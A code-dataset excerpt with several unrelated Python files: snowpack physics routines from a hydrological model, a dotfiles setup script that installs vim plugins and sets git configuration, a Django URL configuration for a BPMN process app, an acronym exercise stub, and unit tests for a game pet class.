s.ice_content[:, roi] = 0
s.liquid_water_content[:, roi] = 0
s.temp[:, roi] = constants.T0
def albedo_aging(self):
snow.albedo(self.model)
def compaction(self):
snow.compaction(self.model)
def accumulation(self):
model = self.model
s = model.state
pos = s.meteo.snowfall > 0
self.add_snow(
pos,
s.meteo.snowfall[pos],
density=snow.fresh_snow_density(s.meteo.wet_bulb_temp[pos]),
)
def heat_conduction(self):
model = self.model
s = model.state
_heat_conduction(
model.grid.roi_idxs,
s.snow.num_layers,
s.snow.thickness,
s.soil.thickness,
model.timestep,
s.snow.temp,
s.snow.therm_cond,
s.soil.therm_cond,
s.surface.heat_flux,
s.snow.heat_cap,
)
def melt(self):
model = self.model
s = model.state
_melt(
model.grid.roi_idxs,
model.timestep,
s.snow.num_layers,
s.snow.melt,
s.snow.thickness,
s.snow.temp,
s.snow.ice_content,
s.snow.liquid_water_content,
s.snow.heat_cap,
)
def sublimation(self):
model = self.model
s = model.state
# First resublimation
frost = -np.minimum(s.snow.sublimation, 0)
pos = frost > 0
self.add_snow(
pos,
frost[pos],
density=snow.fresh_snow_density(s.meteo.wet_bulb_temp[pos]),
)
# Then sublimation
_sublimation(
model.grid.roi_idxs,
model.timestep,
s.snow.num_layers,
s.snow.ice_content,
s.snow.thickness,
s.snow.sublimation,
)
def runoff(self):
model = self.model
s = model.state
_runoff(
model.grid.roi_idxs,
snow.max_liquid_water_content(model),
s.meteo.rainfall,
s.snow.num_layers,
s.snow.thickness,
s.snow.temp,
s.snow.ice_content,
s.snow.liquid_water_content,
s.snow.runoff,
s.snow.heat_cap,
)
def update_layers(self):
model = self.model
s = model.state
_update_layers(
model.grid.roi_idxs,
s.snow.num_layers,
np.array(model.config.snow.min_thickness),
s.snow.thickness,
s.snow.ice_content,
s.snow.liquid_water_content,
s.snow.heat_cap,
s.snow.temp,
s.snow.density,
s.snow.depth,
)
s.snow.albedo[s.snow.num_layers == 0] = np.nan
def update_properties(self):
snow.snow_properties(self.model)
def add_snow(
self,
pos,
ice_content,
liquid_water_content=0,
density=None,
albedo=None,
):
"""
Add snow to the top of the snowpack.
"""
model = self.model
s = model.state
ice_content = np.nan_to_num(ice_content, nan=0., copy=True)
pos_init = (s.snow.num_layers[pos] == 0) & (ice_content > 0)
pos_init_global = model.global_mask(pos_init, pos)
# If albedo is None, set it to the maximum albedo for currently snow-free pixels and keep
# the current albedo for the other pixels
if albedo is None:
albedo = s.snow.albedo[pos]
albedo[pos_init] = model.config.snow.albedo.max
s.snow.albedo[pos] = albedo
# Initialize first snow layer where necessary
s.snow.num_layers[pos_init_global] = 1
s.snow.temp[0, pos_init_global] = np.minimum(s.meteo.temp[pos_init_global], constants.T0)
# Add snow to first layer
s.snow.ice_content[0, pos] += ice_content
s.snow.liquid_water_content[0, pos] += liquid_water_content
s.snow.thickness[0, pos] += ice_content / density
@njit(cache=True, parallel=True)
def _melt(
roi_idxs,
timestep,
num_layers,
melt,
thickness,
temp,
ice_content,
liquid_water_content,
heat_cap,
):
"""
Calculate snowmelt following [1].
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
timestep : float
Model timestep (s).
num_layers : ndarray(float, ndim=2)
Number of snow layers.
melt : ndarray(float, ndim=2)
Snowmelt (kg m-2).
thickness : ndarray(float, ndim=3)
Snow thickness (m).
temp : ndarray(float, ndim=3)
Snow temperature (K).
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
liquid_water_content : ndarray(float, ndim=3)
Liquid water content of snow (kg m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
ice_content_change = melt[i, j]
for k in range(num_layers[i, j]):
cold_content = heat_cap[k, i, j] * (c.T0 - temp[k, i, j])
if cold_content < 0:
ice_content_change -= cold_content / c.LATENT_HEAT_OF_FUSION
temp[k, i, j] = c.T0
if ice_content_change > 0:
if ice_content_change > ice_content[k, i, j]: # layer melts completely
ice_content_change -= ice_content[k, i, j]
thickness[k, i, j] = 0.
liquid_water_content[k, i, j] += ice_content[k, i, j]
ice_content[k, i, j] = 0.
else: # layer melts partially
thickness[k, i, j] *= (1 - ice_content_change / ice_content[k, i, j])
ice_content[k, i, j] -= ice_content_change
liquid_water_content[k, i, j] += ice_content_change
ice_content_change = 0.
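# A small, self-contained sketch (illustrative numbers only) of the per-layer
# bookkeeping in _melt above: energy from an already-warm layer (negative cold
# content) adds to the available melt, and the available melt then converts ice
# to liquid water, at most up to the layer's ice content. T0 and the latent heat
# of fusion below are the usual constants; they are hard-coded here rather than
# read from openamundsen.constants to keep the sketch standalone.
def _melt_one_layer_sketch(melt, temp, ice, lwc, heat_cap, T0=273.15, L_f=3.34e5):
    cold_content = heat_cap * (T0 - temp)
    if cold_content < 0:  # layer above the melting point: release energy, reset to T0
        melt -= cold_content / L_f
        temp = T0
    melted = min(melt, ice)
    ice -= melted
    lwc += melted
    return melt - melted, temp, ice, lwc

# _melt_one_layer_sketch(melt=2.0, temp=272.0, ice=10.0, lwc=0.0, heat_cap=2.1e3)
# -> (0.0, 272.0, 8.0, 2.0)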
@njit(cache=True, parallel=True)
def _sublimation(
roi_idxs,
timestep,
num_layers,
ice_content,
thickness,
sublimation,
):
"""
Calculate snow sublimation following [1].
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
timestep : float
Model timestep (s).
num_layers : ndarray(float, ndim=2)
Number of snow layers.
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
thickness : ndarray(float, ndim=3)
Snow thickness (m).
sublimation : ndarray(float, ndim=2)
Snow sublimation (kg m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
ice_content_change = max(sublimation[i, j], 0.)
if ice_content_change > 0:
for k in range(num_layers[i, j]):
if ice_content_change > ice_content[k, i, j]: # complete sublimation of layer
ice_content_change -= ice_content[k, i, j]
thickness[k, i, j] = 0.
ice_content[k, i, j] = 0.
else: # partial sublimation
thickness[k, i, j] *= (1 - ice_content_change / ice_content[k, i, j])
ice_content[k, i, j] -= ice_content_change
ice_content_change = 0.
@njit(cache=True, parallel=True)
def _runoff(
roi_idxs,
max_liquid_water_content,
rainfall,
num_layers,
thickness,
temp,
ice_content,
liquid_water_content,
runoff,
heat_cap,
):
"""
Calculate snowmelt runoff following [1].
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
max_liquid_water_content : ndarray(float, ndim=3)
Maximum liquid water content (kg m-2).
rainfall : ndarray(float, ndim=2)
Rainfall amount (kg m-2).
num_layers : ndarray(float, ndim=2)
Number of snow layers.
thickness : ndarray(float, ndim=3)
Snow thickness (m).
temp : ndarray(float, ndim=3)
Snow temperature (K).
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
liquid_water_content : ndarray(float, ndim=3)
Liquid water content of snow (kg m-2).
runoff : ndarray(float, ndim=2)
Snow runoff (kg m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
runoff[i, j] = rainfall[i, j]
if np.isnan(runoff[i, j]):
runoff[i, j] = 0.
for k in range(num_layers[i, j]):
liquid_water_content[k, i, j] += runoff[i, j]
if liquid_water_content[k, i, j] > max_liquid_water_content[k, i, j]:
runoff[i, j] = liquid_water_content[k, i, j] - max_liquid_water_content[k, i, j]
liquid_water_content[k, i, j] = max_liquid_water_content[k, i, j]
else:
runoff[i, j] = 0.
# Refreeze liquid water
cold_content = heat_cap[k, i, j] * (c.T0 - temp[k, i, j])
if cold_content > 0:
ice_content_change = min(
liquid_water_content[k, i, j],
cold_content / c.LATENT_HEAT_OF_FUSION,
)
liquid_water_content[k, i, j] -= ice_content_change
ice_content[k, i, j] += ice_content_change
temp[k, i, j] += c.LATENT_HEAT_OF_FUSION * ice_content_change / heat_cap[k, i, j]
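# A compact, self-contained sketch (illustrative numbers) of the percolation
# logic in _runoff above: water entering at the top is added to each layer in
# turn, the excess over that layer's holding capacity drains downward, and
# whatever leaves the bottom layer is runoff. The refreezing step of _runoff is
# omitted here to keep the sketch short.
def _percolation_sketch(inflow, lwc, max_lwc):
    water = inflow
    for k in range(len(lwc)):
        lwc[k] += water
        water = max(lwc[k] - max_lwc[k], 0.0)
        lwc[k] = min(lwc[k], max_lwc[k])
    return water  # runoff leaving the snowpack

# _percolation_sketch(5.0, [0.0, 1.0], [2.0, 2.0]) -> 2.0, with lwc ending as [2.0, 2.0]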
@njit(parallel=True, cache=True)
def _heat_conduction(
roi_idxs,
num_layers,
snow_thickness,
soil_thickness,
timestep,
temp,
therm_cond_snow,
therm_cond_soil,
heat_flux,
heat_cap,
):
"""
Update snow layer temperatures.
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
num_layers : ndarray(float, ndim=2)
Number of snow layers.
snow_thickness : ndarray(float, ndim=3)
Snow thickness (m).
soil_thickness : ndarray(float, ndim=3)
Soil thickness (m).
timestep : float
Model timestep (s).
temp : ndarray(float, ndim=3)
Snow temperature (K).
therm_cond_snow : ndarray(float, ndim=3)
Snow thermal conductivity (W m-1 K-1).
therm_cond_soil : ndarray(float, ndim=3)
Soil thermal conductivity (W m-1 K-1).
heat_flux : ndarray(float, ndim=2)
Surface heat flux (W m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
ns = num_layers[i, j]
if ns > 0:
temp[:ns, i, j] += heatconduction.temp_change(
snow_thickness[:ns, i, j],
timestep,
temp[:ns, i, j],
therm_cond_snow[:ns, i, j],
temp[-1, i, j],
soil_thickness[0, i, j],
therm_cond_soil[0, i, j],
heat_flux[i, j],
heat_cap[:ns, i, j],
)
@njit(cache=True, parallel=True)
def _update_layers(
roi_idxs,
num_layers,
min_thickness,
thickness,
ice_content,
liquid_water_content,
heat_cap,
temp,
density,
depth,
):
"""
Update snow layers.
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
num_layers : ndarray(float, ndim=2)
Number of snow layers.
min_thickness : ndarray(float, ndim=1)
Minimum snow layer thicknesses (m).
thickness : ndarray(float, ndim=3)
Snow thickness (m).
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
liquid_water_content : ndarray(float, ndim=3)
Liquid water content of snow (kg m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
temp : ndarray(float, ndim=3)
Snow temperature (K).
density : ndarray(float, ndim=3)
Snow density (kg m-3).
depth : ndarray(float, ndim=2)
Snow depth (m).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
max_num_layers = len(min_thickness)
num_layers_prev = num_layers.copy()
thickness_prev = thickness.copy()
ice_content_prev = ice_content.copy()
liquid_water_content_prev = liquid_water_content.copy()
energy_prev = heat_cap * (temp - c.T0) # energy content (J m-2)
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
num_layers[i, j] = 0
thickness[:, i, j] = 0.
ice_content[:, i, j] = 0.
liquid_water_content[:, i, j] = 0.
temp[:, i, j] = c.T0
density[:, i, j] = np.nan
internal_energy = np.zeros(max_num_layers)
if depth[i, j] > 0:
new_thickness = depth[i, j]
# Update thicknesses and number of layers
for k in range(max_num_layers):
thickness[k, i, j] = min_thickness[k]
new_thickness -= min_thickness[k]
if new_thickness <= min_thickness[k] or k == max_num_layers - 1:
thickness[k, i, j] += new_thickness
break
# Set thin snow layers to 0 to avoid numerical artifacts
# TODO should this be done at some other location?
for k in range(max_num_layers):
if thickness[k, i, j] < 1e-6:
thickness[k, i, j] = 0.
ns = (thickness[:, i, j] > 0).sum() # new number of layers
new_thickness = thickness[0, i, j]
k_new = 0
# TODO optimize this loop
for k_old in range(num_layers_prev[i, j]):
while True: # TODO replace with normal loop
weight = min(new_thickness / thickness_prev[k_old, i, j], 1.)
ice_content[k_new, i, j] += weight * ice_content_prev[k_old, i, j]
liquid_water_content[k_new, i, j] += weight * liquid_water_content_prev[k_old, i, j]
internal_energy[k_new] += weight * energy_prev[k_old, i, j]
if weight == 1.:
new_thickness -= thickness_prev[k_old, i, j]
break
thickness_prev[k_old, i, j] *= 1 - weight
ice_content_prev[k_old, i, j] *= 1 - weight
liquid_water_content_prev[k_old, i, j] *= 1 - weight
energy_prev[k_old, i, j] *= 1 - weight
k_new += 1
if k_new >= ns:
break
if weight < 1:
new_thickness = thickness[k_new, i, j]
num_layers[i, j] = ns
# Update areal heat capacity and snow temperature
heat_cap[:ns, i, j] = ( # TODO use snow_heat_capacity() for this
ice_content[:ns, i, j] * c.SPEC_HEAT_CAP_ICE
+ liquid_water_content[:ns, i, j] * c.SPEC_HEAT_CAP_WATER
)
temp[:ns, i, j] = c.T0 + internal_energy[:ns] / heat_cap[:ns, i, j]
# Update density
density[:ns, i, j] = (
(liquid_water_content[:ns, i, j] + ice_content[:ns, i, j])
/ thickness[:ns, i, j]
)
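# A self-contained sketch (not the full mass/energy remapping above) of how the
# total snow depth is split into layers in _update_layers: every layer gets its
# configured minimum thickness, and the layer at which the remaining depth no
# longer exceeds that minimum (or the last layer) absorbs the rest.
def _split_depth_sketch(depth, min_thickness):
    thickness = [0.0] * len(min_thickness)
    remaining = depth
    for k, t_min in enumerate(min_thickness):
        thickness[k] = t_min
        remaining -= t_min
        if remaining <= t_min or k == len(min_thickness) - 1:
            thickness[k] += remaining
            break
    return thickness

# _split_depth_sketch(0.5, [0.1, 0.2, 0.5]) -> [0.1, 0.4, 0.0]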
| 30.470492
| 161
| 0.559907
| 5,494
| 0.295424
| 0
| 0
| 12,904
| 0.693875
| 0
| 0
| 6,343
| 0.341077
|
5596e16fb509c3accc1b616f5872b39869a62e82
| 2,746
|
py
|
Python
|
scripts/custom_task_manager.py
|
operaun/dotfiles
|
6e91206427199a9f6a9ac7397a886ac2f26eade0
|
[
"MIT"
] | 1
|
2016-10-06T12:31:04.000Z
|
2016-10-06T12:31:04.000Z
|
scripts/custom_task_manager.py
|
operaun/dotfiles
|
6e91206427199a9f6a9ac7397a886ac2f26eade0
|
[
"MIT"
] | null | null | null |
scripts/custom_task_manager.py
|
operaun/dotfiles
|
6e91206427199a9f6a9ac7397a886ac2f26eade0
|
[
"MIT"
] | null | null | null |
# scripts/custom_task_manager.py
import os
import subprocess
from abc import ABCMeta, abstractmethod
from pretty_printer import *
class CustomTaskManager(object):
def __init__(self):
self.tasks = list()
def printMessages(self):
for task in self.tasks:
task.printHelpMessage()
def doWorks(self):
for task in self.tasks:
task.doWork()
def addTask(self, task):
self.tasks.append(task)
class CustomTask(object):
__metaclass__ = ABCMeta
    @abstractmethod
    def printHelpMessage(self): raise NotImplementedError
    @abstractmethod
    def doWork(self): raise NotImplementedError
class ZshTask(CustomTask):
    def __readStringFromCmd(self, cmd):
        ret_string = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).stdout.readline().strip()
        if len(ret_string) == 0:
            return False
        return ret_string
def printHelpMessage(self):
printBlue("\t Default Zsh: change $SHELL config")
    def doWork(self):
        zsh_file_path = self.__readStringFromCmd("which zsh")
        if zsh_file_path is False:
            printHeader("Cannot find a zsh installation")
            return
        printHeader("Your new default shell path($SHELL): %s" % zsh_file_path)
        os.system("chsh -s %s" % zsh_file_path)
class VimUpdateTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Vim 8: upgrade vim version")
def doWork(self):
os.system("add-apt-repository ppa:pi-rho/dev")
os.system("apt update")
os.system("apt install vim")
class VimColorTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Jellybeans color: color for VIM")
def doWork(self):
os.system("mkdir -p ~/.vim/colors")
os.system("cp ./custom_files/jellybeans.vim ~/.vim/colors/")
class VimVundleTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Vundle: plugin framework for VIM")
def doWork(self):
os.system("mkdir -p ~/.vim/bundle")
os.system("git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim")
os.system("vim +PluginInstall +qall")
class GitConfigTask(CustomTask):
def printHelpMessage(self):
printBlue("\t Git: setting personal configuration for Git")
def doWork(self):
os.system('git config --global user.name "Jongmin Won"')
os.system('git config --global user.email "operaun@gmail.com"')
os.system('git config --global merge.tool vimdiff')
os.system('git config --global core.editor vim')
os.system('git config --global core.autocrlf false')
os.system('git config --global core.filemode false')
os.system('git config --global color.ui true')
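# A minimal usage sketch (a hypothetical driver, not part of the original file):
# tasks are registered with the manager, their help messages are printed, and
# each task's doWork() then runs in registration order.
if __name__ == "__main__":
    manager = CustomTaskManager()
    manager.addTask(ZshTask())
    manager.addTask(GitConfigTask())
    manager.printMessages()
    manager.doWorks()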
| 31.204545
| 99
| 0.659505
| 2,600
| 0.946832
| 0
| 0
| 130
| 0.047342
| 0
| 0
| 875
| 0.318645
|
5598265430fb84db260c24576996f2ee0f789ef1
| 27
|
py
|
Python
|
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 1
|
2021-05-15T19:59:04.000Z
|
2021-05-15T19:59:04.000Z
|
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | null | null | null |
exercises/acronym/acronym.py
|
RJTK/python
|
f9678d629735f75354bbd543eb7f10220a498dae
|
[
"MIT"
] | 2
|
2018-03-03T08:32:12.000Z
|
2019-08-22T11:55:53.000Z
|
def abbreviate():
pass
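# A possible implementation sketch under a separate name, so the exercise stub
# above stays untouched. The parameter name and the delimiter handling (split on
# anything that is not a letter or apostrophe) are assumptions about the
# intended behaviour, not part of the original file.
import re

def _abbreviate_sketch(words):
    parts = [p for p in re.split(r"[^A-Za-z']+", words) if p]
    return "".join(p[0].upper() for p in parts)

# _abbreviate_sketch("Portable Network Graphics") -> "PNG"
# _abbreviate_sketch("Complementary metal-oxide semiconductor") -> "CMOS"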
| 9
| 17
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
5598bbdfc235215336c94064608a0db8ff763655
| 3,961
|
py
|
Python
|
bpmn/urls.py
|
VSSantana/SFDjango-BPMN
|
e5a3fb8da9282fd88f72a85a4b34d89d38391e36
|
[
"MIT"
] | 1
|
2021-09-21T00:02:10.000Z
|
2021-09-21T00:02:10.000Z
|
bpmn/urls.py
|
VSSantana/SFDjango-BPMN
|
e5a3fb8da9282fd88f72a85a4b34d89d38391e36
|
[
"MIT"
] | 5
|
2021-09-22T13:54:06.000Z
|
2021-09-22T14:05:56.000Z
|
bpmn/urls.py
|
marcelobbfonseca/SFDjango-BPMN
|
50565763414f52d9e84004494cf550c6fe2358fa
|
[
"MIT"
] | 1
|
2021-09-18T01:22:25.000Z
|
2021-09-18T01:22:25.000Z
|
from django.urls import path
from django.contrib.auth.views import LoginView
from .views.activity_view import *
from .views.activity_type_view import *
from .views.event_view import *
from .views.flow_view import *
from .views.lane_view import *
from .views.pool_view import *
from .views.process_type_view import *
from .views.process_view import *
from .views.sequence_view import *
urlpatterns = [
path('', LoginView.as_view(template_name='accounts/login.html'), name="login"),
path('activity_type_list/', ActivityTypeView.as_view(), name='activity_type_list'),
path('activity_type_create_form/', ActivityTypeCreate.as_view(), name='activity_type_create_form'),
path('activity_type_update_form/<int:pk>', ActivityTypeUpdate.as_view(), name='activity_type_update_form'),
path('activity_type_delete_confirmation/<int:pk>', ActivityTypeDelete.as_view(), name='activity_type_delete_confirmation'),
path('process_type_list/', ProcessTypeView.as_view(), name='process_type_list'),
path('process_type_create_form/', ProcessTypeCreate.as_view(), name='process_type_create_form'),
path('process_type_update_form/<int:pk>', ProcessTypeUpdate.as_view(), name='process_type_update_form'),
path('process_type_delete_confirmation/<int:pk>', ProcessTypeDelete.as_view(), name='process_type_delete_confirmation'),
path('pool_list/', PoolView.as_view(), name='pool_list'),
path('pool_create_form/', PoolCreate.as_view(), name='pool_create_form'),
path('pool_update_form/<int:pk>', PoolUpdate.as_view(), name='pool_update_form'),
path('pool_delete_confirmation/<int:pk>', PoolDelete.as_view(), name='pool_delete_confirmation'),
path('lane_list/', LaneView.as_view(), name='lane_list'),
path('lane_create_form/', LaneCreate.as_view(), name='lane_create_form'),
path('lane_update_form/<int:pk>', LaneUpdate.as_view(), name='lane_update_form'),
path('lane_delete_confirmation/<int:pk>', LaneDelete.as_view(), name='lane_delete_confirmation'),
path('event_list/', EventView.as_view(), name='event_list'),
path('event_create_form/', EventCreate.as_view(), name='event_create_form'),
path('event_update_form/<int:pk>', EventUpdate.as_view(), name='event_update_form'),
path('event_delete_confirmation/<int:pk>', EventDelete.as_view(), name='event_delete_confirmation'),
path('activity_list/', ActivityView.as_view(), name='activity_list'),
path('activity_create_form/', ActivityCreate.as_view(), name='activity_create_form'),
path('activity_update_form/<int:pk>', ActivityUpdate.as_view(), name='activity_update_form'),
path('activity_delete_confirmation/<int:pk>', ActivityDelete.as_view(), name='activity_delete_confirmation'),
path('sequence_list/', SequenceView.as_view(), name='sequence_list'),
path('sequence_create_form/', SequenceCreate.as_view(), name='sequence_create_form'),
path('sequence_update_form/<int:pk>', SequenceUpdate.as_view(), name='sequence_update_form'),
path('sequence_delete_confirmation/<int:pk>', SequenceDelete.as_view(), name='sequence_delete_confirmation'),
path('flow_list/', FlowView.as_view(), name='flow_list'),
path('flow_create_form/', FlowCreate.as_view(), name='flow_create_form'),
path('flow_update_form/<int:pk>', FlowUpdate.as_view(), name='flow_update_form'),
path('flow_delete_confirmation/<int:pk>', FlowDelete.as_view(), name='flow_delete_confirmation'),
path('process_list/', ProcessView.as_view(), name='process_list'),
path('process_create_form/', ProcessCreate.as_view(), name='process_create_form'),
path('process_update_form/<int:pk>', ProcessUpdate.as_view(), name='process_update_form'),
path('process_delete_confirmation/<int:pk>', ProcessDelete.as_view(), name='process_delete_confirmation'),
path('process-modeling/', ProcessModelingView.as_view(), name="process_modeling"),
path('ontology-suggestion', OntologySuggestionView.as_view(), name="ontology_suggestion")
]
| 73.351852
| 127
| 0.757637
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,835
| 0.463267
|
5598fc6baf6adbca126912ba31690ef9d92c7c11
| 2,106
|
py
|
Python
|
utils/boilerplate/test_gorilla.py
|
cfginn/sap-simulation-package
|
73314e5380cec5c61a9fe5ff5fbafa25b9e2beac
|
[
"MIT"
] | null | null | null |
utils/boilerplate/test_gorilla.py
|
cfginn/sap-simulation-package
|
73314e5380cec5c61a9fe5ff5fbafa25b9e2beac
|
[
"MIT"
] | null | null | null |
utils/boilerplate/test_gorilla.py
|
cfginn/sap-simulation-package
|
73314e5380cec5c61a9fe5ff5fbafa25b9e2beac
|
[
"MIT"
] | null | null | null |
import unittest
from pysapets.gorilla import Gorilla
from pysapets.animal import Animal
import pysapets.constants as constants
from unittest.mock import patch
from io import StringIO
from copy import deepcopy
class GorillaTest(unittest.TestCase):
def setUp(self):
self.gorilla = Gorilla()
self.friends = [self.gorilla, Animal(2, 2), Animal(2, 2), Animal(2, 2), Animal(2, 2)]
# test that get_type returns the correct type
def test_get_type(self):
self.assertEqual(self.gorilla.get_type(), constants.GORILLA)
# test that gorilla starts with base health of 6
def test_get_health(self):
self.assertEqual(self.gorilla.get_health(), 6)
# test that gorilla starts with base attack of 6
def test_get_attack(self):
self.assertEqual(self.gorilla.get_attack(), 6)
# test that initializing gorilla with additional health increases health
def test_init_add_health(self):
newGorilla = Gorilla(addHealth = 3)
self.assertEqual(newGorilla.get_health(), 6 + 3)
    # test that initializing a gorilla with additional attack increases attack
def test_init_add_attack(self):
newGorilla = Gorilla(addAttack = 3)
self.assertEqual(newGorilla.get_attack(), 6 + 3)
# test that initializing gorilla with additional health and attack increases health and attack
def test_init_add_health_attack(self):
newGorilla = Gorilla(addHealth = 3, addAttack = 3)
self.assertEqual(newGorilla.get_health(), 6 + 3)
self.assertEqual(newGorilla.get_attack(), 6 + 3)
# test that gorilla ability has correct trigger
def test_get_ability_trigger(self):
self.assertEqual(self.gorilla.get_ability_trigger(), constants.HURT)
# test that gorilla ability has correct triggeredBy
def test_get_ability_triggeredBy(self):
self.assertEqual(self.gorilla.get_ability_triggeredBy(), constants.SELF)
# TODO add relevant tests for gorilla ability
def test_run_ability(self):
pass
def test_run_ability_level_1(self):
pass
def test_run_ability_level_2(self):
pass
def test_run_ability_level_3(self):
pass
| 31.432836
| 96
| 0.74359
| 1,878
| 0.891738
| 0
| 0
| 0
| 0
| 0
| 0
| 526
| 0.249763
|